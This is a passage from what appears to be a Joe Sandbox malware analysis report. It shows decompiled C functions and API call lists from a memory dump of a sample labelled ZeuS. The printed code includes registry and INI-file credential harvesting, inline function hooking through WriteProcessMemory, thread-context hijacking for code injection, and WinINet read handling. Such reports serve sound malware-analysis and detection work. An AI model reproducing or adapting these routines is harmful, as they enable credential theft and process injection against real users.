					return _t70;
				} else {
					E0040F34A(0x83,  &_v216);
					_t141 =  &_v284;
					E0040F34A(0x84, _t141);
					_v48 =  &_v216;
					_v44 = _t141;
					E00405299( &_v36,  &_v36, 0, 8);
					E0040F34A(0x85,  &_v120);
					E0040F34A(0x86,  &_v100);
					E0040F34A(0x87,  &_v60);
					_t145 =  &_v80;
					E0040F34A(0x88, _t145);
					_t12 = _t127 + 0x3fc; // 0x3fc
					_v20 = _t12;
					_v16 = 0;
					do {
						if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) {
							goto L22;
						}
						_v28 = _t134;
						_v8 = 0x104;
						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
							L21:
							RegCloseKey(_v12);
							goto L22;
						} else {
							goto L4;
						}
						do {
							L4:
							_t136 = _v24;
							_v28 = _v28 + 1;
							_t102 = E0040930A(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
							_t145 = _t145 | 0xffffffff;
							_v8 = _t102;
							if(_t102 != _t145 && _t102 != 0) {
								_t137 = _t136 + 0x1fe;
								_t110 = E0040930A(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
								_v8 = _t110;
								if(_t110 == _t145 || _t110 == 0) {
									_t114 = E0040930A(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
									_v8 = _t114;
									if(_t114 == _t145 || _t114 == 0) {
										goto L19;
									} else {
										goto L10;
									}
								} else {
									L10:
									_t115 = _v12;
									_t129 =  &_v804;
									_v40 = _t115;
									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) {
										_t117 = _t145;
									} else {
										_t145 =  &_v40;
										_t117 = E00409432(_t145,  &_v80, _t116, _v20, 0xff);
									}
									_v8 = _t117;
									if(_t117 != 0xffffffff && _t117 != 0) {
										_t138 = _v20;
										if(E004149CD(_t138) > 0) {
											_t145 =  &_v152;
											_t119 = 0x56;
											E0040F34A(_t119, _t145);
											_t121 = _v24;
											_push(_t121);
											_t129 = _t138;
											_push(_t138);
											_push(_t121 + 0x1fe);
											_t124 = E00405ED9(_t145, 0x307, _t138 + 0x1fe, _t145);
											_t147 = _t147 + 0x10;
											if(_t124 > 0) {
												_t129 =  &_v36;
												if(E004055DA(_t124,  &_v36, _v20 + 0x1fe) != 0) {
													_v32 = _v32 + 1;
												}
											}
										}
									}
									goto L19;
								}
							}
							L19:
							_v8 = 0x104;
						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
						_t134 = 0;
						goto L21;
						L22:
						_v16 = _v16 + 1;
					} while (_v16 < 2);
					E004051E6(_v24);
					if(_v32 <= _t134) {
						return E004051E6(_v36);
					}
					return E0041293E(0x307, _v36, 0xcb);
				}
			}

APIs
  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 00414ADE
  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00414B09
  • RegCloseKey.ADVAPI32(?), ref: 00414C5F
    • Part of subcall function 0040930A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041C0F5,?,?,00000104,.exe,00000000), ref: 0040931F
  • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 00414C4C
    • Part of subcall function 0040930A: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041C0F5,?,?,00000104), ref: 004093A0
  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 00414BA9
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Open$Enum$CloseEnvironmentExpandStrings
  • String ID:
  • API String ID: 2343474859-0
  • Opcode ID: 8c6a3115731f816fc8e74562e7c8324fe478208e28648832730cded4eb5e1f89
  • Instruction ID: ef94988da21e9bdeda12d3fe619bc01620b3d4e747c4035f87d1dd888b5c9646
  • Opcode Fuzzy Hash: 8c6a3115731f816fc8e74562e7c8324fe478208e28648832730cded4eb5e1f89
  • Instruction Fuzzy Hash: 58714972D00119ABDB10DBE5CD45EEFB7BCEB88314F10447AB905F3291E678AE858B64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%
			E00413AED(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				char _v564;
				short _v576;
				short _v588;
				short _v600;
				short _v608;
				WCHAR* _v612;
				WCHAR* _v616;
				WCHAR* _v620;
				WCHAR* _v624;
				WCHAR* _v628;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t51;
				WCHAR* _t54;
				WCHAR* _t56;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t63;
				long _t67;
				WCHAR* _t69;
				long _t77;
				long _t80;
				WCHAR* _t82;
				void* _t83;
				WCHAR* _t86;
				WCHAR* _t87;
				short* _t92;
				WCHAR* _t93;
				int _t102;
				WCHAR* _t107;
				intOrPtr _t114;
				signed int _t115;
				void* _t117;

				_t117 = (_t115 & 0xfffffff8) - 0x26c;
				if(E0040AA77( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L19:
					return 1;
				}
				_t120 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t107 = E004051B6(0x1fffe);
					_v612 = _t107;
					__eflags = _t107;
					if(_t107 == 0) {
						goto L19;
					}
					_t51 = GetPrivateProfileStringW(0, 0, 0, _t107, 0xffff,  &_v524);
					__eflags = _t51;
					if(_t51 == 0) {
						L18:
						E004051E6(_t107);
						goto L19;
					}
					_t9 =  &(_t51[0]); // 0x1
					_t54 = E00406096(_t107, _t9);
					__eflags = _t54;
					if(_t54 == 0) {
						goto L18;
					}
					_t56 = E004051B6(0xc1c);
					_v620 = _t56;
					__eflags = _t56;
					if(_t56 != 0) {
						_t11 =  &(_t56[0xff]); // 0x1fe
						_t92 = _t11;
						_v624 = _t107;
						_v616 = _t92;
						_t57 = 0x5c;
						_t93 =  &(_t92[0xff]);
						__eflags = _t93;
						E0040F34A(_t57,  &_v608);
						_t59 = 0x5d;
						E0040F34A(_t59,  &_v588);
						_t61 = 0x5e;
						E0040F34A(_t61,  &_v576);
						_t63 = 0x5f;
						E0040F34A(_t63,  &_v600);
						do {
							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
							__eflags = _t67;
							if(_t67 != 0) {
								_t102 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524);
								_t25 = _t102 - 1; // -1
								__eflags = _t25 - 0xfffe;
								if(_t25 <= 0xfffe) {
									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
									__eflags = _t77;
									if(_t77 != 0) {
										_t80 = GetPrivateProfileStringW(_v624,  &_v600, 0, _t93, 0xff,  &_v524);
										__eflags = _t80;
										if(_t80 != 0) {
											_t82 = E004139E0(_v624, _t93);
											__eflags = _t82;
											if(_t82 > 0) {
												_t113 =  &_v564;
												_t83 = 0x55;
												E0040F34A(_t83,  &_v564);
												_push(_t102);
												_push(_v620);
												_push(_t93);
												_push(_v616);
												_t37 =  &(_t93[0xff]); // 0x1fe
												_t103 = _t37;
												_t86 = E00405ED9(_t113, 0x311, _t37, _t113);
												_t117 = _t117 + 0x14;
												__eflags = _t86;
												if(_t86 > 0) {
													_t114 = _a4;
													_t87 = E004055DA(_t86, _t114, _t103);
													__eflags = _t87;
													if(_t87 != 0) {
														_t39 = _t114 + 4;
														 *_t39 =  &(( *(_t114 + 4))[0]);
														__eflags =  *_t39;
													}
												}
											}
										}
									}
								}
							}
							_t69 = E004060D2(_v624, 1);
							_v628 = _t69;
							__eflags = _t69;
						} while (_t69 != 0);
						E004051E6(_v620);
						_t107 = _v616;
					}
					goto L18;
				} else {
					E00413A93(_t120,  &_v524, _a4);
					goto L19;
				}
			}

APIs
    • Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96
  • GetPrivateProfileStringW.KERNEL32 ref: 00413B54
  • GetPrivateProfileStringW.KERNEL32 ref: 00413BE8
  • GetPrivateProfileIntW.KERNEL32 ref: 00413C06
  • GetPrivateProfileStringW.KERNEL32 ref: 00413C31
  • GetPrivateProfileStringW.KERNEL32 ref: 00413C4D
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: PrivateProfile$String$CombinePath
  • String ID:
  • API String ID: 2134968610-0
  • Opcode ID: 94ca71887976c4fb54c84a065d582a469aa087435feef25e095cc6f9dce7f5fc
  • Instruction ID: 47977c205ffba1438f5a46821d8cb108c6e69742872f42f6c02cf4ebb7498966
  • Opcode Fuzzy Hash: 94ca71887976c4fb54c84a065d582a469aa087435feef25e095cc6f9dce7f5fc
  • Instruction Fuzzy Hash: 7151B332508705ABD720DF61CC05FEB77E8FF84755F00093ABA44A72A1E739EA458B96
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 96%
			E0040B05B(void* __ecx, signed int __edx, void** __esi, long _a4) {
				char _v5;
				void _v16;
				struct _OVERLAPPED* _v24;
				struct _OVERLAPPED* _v28;
				signed int _v32;
				signed int _v36;
				void* _t29;
				signed int _t31;
				int _t38;
				int _t39;
				signed int _t41;
				int _t42;
				int _t45;
				intOrPtr _t48;
				void* _t49;
				signed int _t53;
				struct _OVERLAPPED* _t54;
				void** _t56;

				_t56 = __esi;
				_t53 = __edx;
				_t49 = __ecx;
				_t54 = 0;
				_v5 = 0;
				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
				 *__esi = _t29;
				if(_t29 != 0xffffffff) {
					_t31 = E0040A521(_t49, _t29);
					_v36 = _t31;
					_v32 = _t53;
					if((_t31 & _t53) == 0xffffffff) {
						L4:
						CloseHandle( *_t56);
						 *_t56 =  *_t56 | 0xffffffff;
					} else {
						if((_t31 | _t53) == 0) {
							L18:
							_t56[2] = _t56[2] | 0xffffffff;
							_t25 =  &(_t56[3]);
							 *_t25 = _t56[3] | 0xffffffff;
							__eflags =  *_t25;
							_v5 = 1;
							E0040A4D1( *_t56, _t54, _t54, _t54);
						} else {
							_v28 = 0;
							_v24 = 0;
							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
								while(1) {
									__eflags = _a4 - _t54;
									if(_a4 == _t54) {
										goto L18;
									}
									__eflags = _a4 - 5;
									if(_a4 != 5) {
										L16:
										_t38 = E0040A4D1( *_t56, _v28, _v24, _t54);
										__eflags = _t38;
										if(_t38 == 0) {
											goto L4;
										} else {
											_t39 = SetEndOfFile( *_t56);
											__eflags = _t39;
											if(_t39 == 0) {
												goto L4;
											} else {
												goto L18;
											}
										}
									} else {
										_t41 = _v16 ^ _t56[4];
										asm("adc edi, [ebp-0x14]");
										_t48 = _t41 + _v28 + 5;
										asm("adc edi, ecx");
										_v16 = _t41;
										__eflags = 0 - _v32;
										if(__eflags > 0) {
											L15:
											_t54 = 0;
											__eflags = 0;
											goto L16;
										} else {
											if(__eflags < 0) {
												L11:
												__eflags = _t41 - 0xa00000;
												if(_t41 > 0xa00000) {
													goto L15;
												} else {
													_t42 = E0040A4D1( *_t56, _t41, 0, 1);
													__eflags = _t42;
													if(_t42 == 0) {
														goto L4;
													} else {
														_v28 = _t48;
														_v24 = 0;
														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
														__eflags = _t45;
														if(_t45 != 0) {
															_t54 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L4;
														}
													}
												}
											} else {
												__eflags = _t48 - _v36;
												if(_t48 > _v36) {
													goto L15;
												} else {
													goto L11;
												}
											}
										}
									}
									goto L19;
								}
								goto L18;
							} else {
								goto L4;
							}
						}
					}
				}
				L19:
				return _v5;
			}

APIs
  • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 0040B07C
    • Part of subcall function 0040A521: GetFileSizeEx.KERNEL32(0040B093,0040B093,?,?,?,0040B093,00000000), ref: 0040A52D
  • ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 0040B0BD
  • CloseHandle.KERNEL32(?,00000000), ref: 0040B0C9
  • ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 0040B138
  • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0040B15E
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: File$Read$CloseCreateHandleSize
  • String ID:
  • API String ID: 1850650832-0
  • Opcode ID: 901a29252d7b615c56e12bc8e3871c776818d5c8f42324924f18d6cbc1905012
  • Instruction ID: 667bed3640bea25cbad98fba60ae2e937129b5823efb42a2a44c610ee3c67668
  • Opcode Fuzzy Hash: 901a29252d7b615c56e12bc8e3871c776818d5c8f42324924f18d6cbc1905012
  • Instruction Fuzzy Hash: D541A230900209AEDB218F65CC45BAFBBB9FF89754F10423AF5A1B62E0D7794941CB9D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 85%
			E00409A29(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, void* _a8) {
				long _v8;
				DWORD* _v12;
				intOrPtr _v47;
				void _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t47;
				void* _t58;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				intOrPtr* _t66;
				long _t68;
				DWORD* _t69;
				void* _t71;

				_t63 = __edx;
				_t61 = __ecx;
				_t58 = __eax;
				_t69 = 0;
				_v12 = 0;
				if(E004099E4(_a4) < 0x1e || VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40,  &_v8) == 0) {
					L18:
					return _v12;
				} else {
					E00405299( &_v48,  &_v48, 0xffffff90, 0x23);
					if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
						L17:
						VirtualProtectEx(0xffffffff, _a4, 0x1e, _v8,  &_v8);
						goto L18;
					} else {
						_t66 =  &_v48;
						_push(0);
						_push(_t66);
						while(1) {
							_t47 = E0041D860(_t58, _t61, _t63, _t66, _t69);
							if(_t47 == 0xffffffff) {
								break;
							}
							_t69 = _t69 + _t47;
							if(_t69 > 0x1e) {
								L16:
								goto L17;
							}
							_t61 =  *_t66;
							if(_t61 == 0xe9 || _t61 == 0xe8) {
								if(_t47 == 5) {
									 *((intOrPtr*)(_t66 + 1)) =  *((intOrPtr*)(_t66 + 1)) + _a4 - _a8;
								}
							}
							_push(0);
							if(_t69 >= 5) {
								_t17 = _t69 + 5; // 0x5
								_t68 = _t17;
								 *((intOrPtr*)(_t71 + _t69 - 0x2b)) = _a4 - _a8 - 5;
								 *((char*)(_t71 + _t69 - 0x2c)) = 0xe9;
								if(WriteProcessMemory(0xffffffff, _a8,  &_v48, _t68, ??) != 0) {
									_t62 = _a4;
									_v48 = 0xe9;
									_v47 = _t58 - _t62 - 5;
									E0040DF7C(_t62, _a8);
									if(WriteProcessMemory(0xffffffff, _t62,  &_v48, 5, 0) != 0) {
										_v12 = _t68;
									}
								}
								goto L16;
							}
							_t66 = _t71 + _t69 - 0x2c;
							_push(_t66);
						}
						goto L16;
					}
				}
			}

APIs
    • Part of subcall function 004099E4: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,0040DF1C,00000000,00000000,00000034,0040E2A7,00422008,00000000), ref: 004099F9
  • VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,0041C534,-00000008,00000034,?,?,0040E03D,?,00000000,?,?,0040E2A7,00422008), ref: 00409A56
  • ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,0040E03D,?,00000000,?,?,0040E2A7), ref: 00409A7D
  • WriteProcessMemory.KERNEL32(000000FF,00422008,?,00000005,00000000,?,00000000,00000000), ref: 00409AF7
  • WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000), ref: 00409B1F
  • VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,0041C534,0041C534,?,?,0040E03D,?,00000000,?,?,0040E2A7,00422008,00000000,0041C534), ref: 00409B37
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
  • String ID:
  • API String ID: 390532180-0
  • Opcode ID: ff75bdb5e7507d29aa2b2dcc0ad68a4f533d712be149fe653230d26d7b9f7bac
  • Instruction ID: 523b0568fd045a6afa61fc32e92698a4c0be3dc787cb8e781cf0af3ca0cb0023
  • Opcode Fuzzy Hash: ff75bdb5e7507d29aa2b2dcc0ad68a4f533d712be149fe653230d26d7b9f7bac
  • Instruction Fuzzy Hash: 52317372900249AADF109EB9DC44EDE7B78EB49330F108726F935B62D1C774E940CB65
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%
			E00416401(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
				intOrPtr _v28;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v61;
				intOrPtr _v64;
				signed int _v72;
				intOrPtr _v76;
				char _v77;
				intOrPtr _v84;
				intOrPtr _v85;
				char _v89;
				void* __esi;
				char _t31;
				intOrPtr _t32;
				char* _t37;
				intOrPtr _t44;
				intOrPtr* _t58;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr _t65;

				_t63 = __edi;
				ResetEvent(_a8);
				_t31 = E004051B6(0x1000);
				_t65 = 0;
				_v52 = _t31;
				if(_t31 != 0) {
					_t58 = __imp__InternetSetStatusCallbackW;
					_t32 =  *_t58(_a4, E004163B8);
					_t62 = 0x28;
					_v56 = _t32;
					 *_a12 = 0;
					 *__edi = 0;
					_v61 = 1;
					E00405299( &_v52,  &_v52, 0, _t62);
					_v64 = _t62;
					_v44 = _v72;
					while(1) {
						L3:
						_t37 =  &_v52;
						_v28 = 0x1000;
						__imp__InternetReadFileExA(_a4, _t37, 8, _t65);
						if(_t37 == 0) {
							break;
						}
						if(_v44 != _t65) {
							_t67 = _a12;
							if(E00405171( *_t63 + _v44, _a12) == 0) {
								L9:
								_v77 = 0;
							} else {
								E00405222( *_t67 +  *_t63, _v76, _v44);
								 *_t63 =  *_t63 + _v56;
								_t65 = 0;
								continue;
							}
						}
						L10:
						asm("sbb eax, eax");
						 *_t58(_a4,  ~(_v72 + 1) & _v72);
						E004051E6(_v84);
						if(_v89 == 0) {
							E004051E6( *_a12);
						}
						_t44 = _v85;
						goto L13;
					}
					if(GetLastError() != 0x3e5) {
						goto L9;
					} else {
						E00408953( &_a8);
						goto L3;
					}
					goto L10;
				} else {
					E004051E6(0);
					_t44 = 0;
				}
				L13:
				return _t44;
			}

APIs
  • ResetEvent.KERNEL32(?), ref: 0041640F
  • InternetSetStatusCallbackW.WININET(?,004163B8), ref: 00416444
  • InternetReadFileExA.WININET ref: 00416484
  • GetLastError.KERNEL32 ref: 0041648E
  • InternetSetStatusCallbackW.WININET(?,?), ref: 004164F2
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
  • String ID:
  • API String ID: 4044253124-0
  • Opcode ID: 7297b6bb6205c2923436f1a44e87f5d49b264f9d02b43835057764d291772a86
  • Instruction ID: a53a8d65e28ab0013b9b6ab4cf1bd99294cc5ab7d5aeb81b3148993dee1bb72a
  • Opcode Fuzzy Hash: 7297b6bb6205c2923436f1a44e87f5d49b264f9d02b43835057764d291772a86
  • Instruction Fuzzy Hash: 38319C71508355AFCB11DF64DC80AAFBBE8FF58344F00482AF884972A1D738C954CB9A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040F667(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v32;
				void _v360;
				short _v880;
				void* __edi;
				void* __esi;
				void* _t18;
				void* _t25;
				void* _t26;
				long _t39;
				void* _t42;
				void* _t44;
				long _t47;

				_t48 =  &_v32;
				_t18 = 0x2b;
				_v16 = __edx;
				_t44 = __ecx;
				E0040F34A(_t18,  &_v32);
				if(E0040AA77(_t48,  &_v880, _t44) == 0) {
					L11:
					return 1;
				}
				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
				_v8 = _t25;
				if(_t25 == 0xffffffff) {
					goto L11;
				}
				_t26 = 0x30;
				_t39 = 0;
				E0040F314(_t26,  &_v360);
				if(WriteFile(_v8,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
					L9:
					FlushFileBuffers(_v8);
					CloseHandle(_v8);
					if(_t39 == 0) {
						E0040A548( &_v880);
					}
					goto L11;
				} else {
					_t42 = _v16;
					if(_t42 == 0) {
						L7:
						_t39 = 1;
						goto L9;
					}
					_t47 = E00405D23(_t42);
					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
						_t39 = 0;
						goto L9;
					} else {
						goto L7;
					}
				}
			}

APIs
    • Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96
  • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 0040F6B2
  • WriteFile.KERNEL32(0040F64F,?,00000146,?,00000000,00000000), ref: 0040F6F0
  • WriteFile.KERNEL32(0040F64F,?,00000000,?,00000000), ref: 0040F714
  • FlushFileBuffers.KERNEL32(0040F64F), ref: 0040F728
  • CloseHandle.KERNEL32(0040F64F), ref: 0040F731
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
  • String ID:
  • API String ID: 2459967240-0
  • Opcode ID: 6bfe1de16d46025d465ddb17f7b6ce1da780e585d12c9166e5d653d7ad6027af
  • Instruction ID: a46e1b76bde762fec91a0b1f305db3532b72d5f95ac4f133f999f281dca87973
  • Opcode Fuzzy Hash: 6bfe1de16d46025d465ddb17f7b6ce1da780e585d12c9166e5d653d7ad6027af
  • Instruction Fuzzy Hash: 47217832940218BADF209BA19C45FEF7BBCAB45754F1040B6A500B32E0D739AA49CA66
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 81%
			E00418A3C(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
				struct _CONTEXT _v720;
				void* __edi;
				void* __esi;
				intOrPtr _t32;
				void* _t36;
				void* _t37;
				void** _t45;
				void* _t46;
				void* _t47;
				void** _t50;
				void* _t52;
				void* _t53;
				signed int _t55;

				_t47 = __edx;
				_t45 = _a4;
				_t32 =  *0x4239d4(_t45, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
				_a40 = _t32;
				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t45 != 0 && _a8 != 0 && E0041CAA4() != 0 && GetProcessId( *_t45) != 0) {
					_t36 = E0041C8D5(_t46, _t47, _t35);
					_a44 = _t36;
					_t63 = _t36;
					if(_t36 != 0) {
						_push(_t52);
						_t37 = E0041C9B9(_t46,  *_t45, _t52, _t63, _t36, 0);
						_t50 = _a8;
						_t53 = _t37;
						_a32 = _t53;
						_t55 = _t53 -  *0x4239c4 + E0041D12E;
						_v720.ContextFlags = 0x10003;
						if(GetThreadContext( *_t50,  &_v720) == 0 || _v720.Eip !=  *0x4239dc) {
							L12:
							VirtualFreeEx( *_t45, _a32, 0, 0x8000);
						} else {
							if(( *0x4239b0 & 0x00000010) != 0) {
								_t55 = _t55 ^ _v720.Eax;
							}
							_v720.Eax = _t55;
							_v720.ContextFlags = 0x10002;
							if(SetThreadContext( *_t50,  &_v720) == 0) {
								goto L12;
							}
						}
						CloseHandle(_a44);
					}
				}
				return _a40;
			}

APIs
    • Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC
  • GetProcessId.KERNEL32(?), ref: 00418AA4
    • Part of subcall function 0041C8D5: CreateMutexW.KERNEL32(004239E8,00000001,?,00423C28,74B5F560,?,00000002,?,74B5F560), ref: 0041C91D
    • Part of subcall function 0041C8D5: GetLastError.KERNEL32 ref: 0041C929
    • Part of subcall function 0041C8D5: CloseHandle.KERNEL32(00000000), ref: 0041C937
  • GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 00418AF6
  • SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 00418B36
  • VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 00418B4C
  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00418B55
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CloseContextHandleThread$CreateErrorFreeLastMutexObjectProcessSingleVirtualWait
  • String ID:
  • API String ID: 3998962940-0
  • Opcode ID: 596ec76e7ab6cbce03bf29b419d8869d22d907a1ba24083a6647a35471b404e6
  • Instruction ID: 75ac589b2be65b7c67d57d45d8e7c3e659a1941366ab9da7b7a24346731a83fa
  • Opcode Fuzzy Hash: 596ec76e7ab6cbce03bf29b419d8869d22d907a1ba24083a6647a35471b404e6
  • Instruction Fuzzy Hash: B8319EB150110DABDF129F64CC48FDA7BB9BF09344F04416AFE08A6260CB79E891CF58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00417BC7(struct HWND__* __ecx, intOrPtr* __edx) {
				struct tagRECT _v24;
				char _v28;
				struct HWND__* _v32;
				intOrPtr _v36;
				struct HWND__* _v40;
				void* __edi;
				intOrPtr _t29;
				signed int _t30;
				RECT* _t52;
				signed int _t54;
				intOrPtr* _t61;

				_t55 = __edx;
				_t61 = __edx;
				 *( *(__edx + 0x14)) = 0x3c;
				_v32 = __ecx;
				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) == 0) {
					L12:
					return 1;
				}
				_t29 =  *((intOrPtr*)(_t61 + 0x14));
				_t54 =  *(_t29 + 0x24);
				if((_t54 & 0x40000000) == 0) {
					_t52 =  *_t61 + 0x24;
				} else {
					_t52 = _t61 + 4;
				}
				if((_t54 & 0x10000000) == 0) {
					_t30 = 0;
					goto L9;
				} else {
					if((IntersectRect( &_v24, _t29 + 0x14, _t52) & 0xffffff00 | _t40 != 0x00000000) != 0) {
						L10:
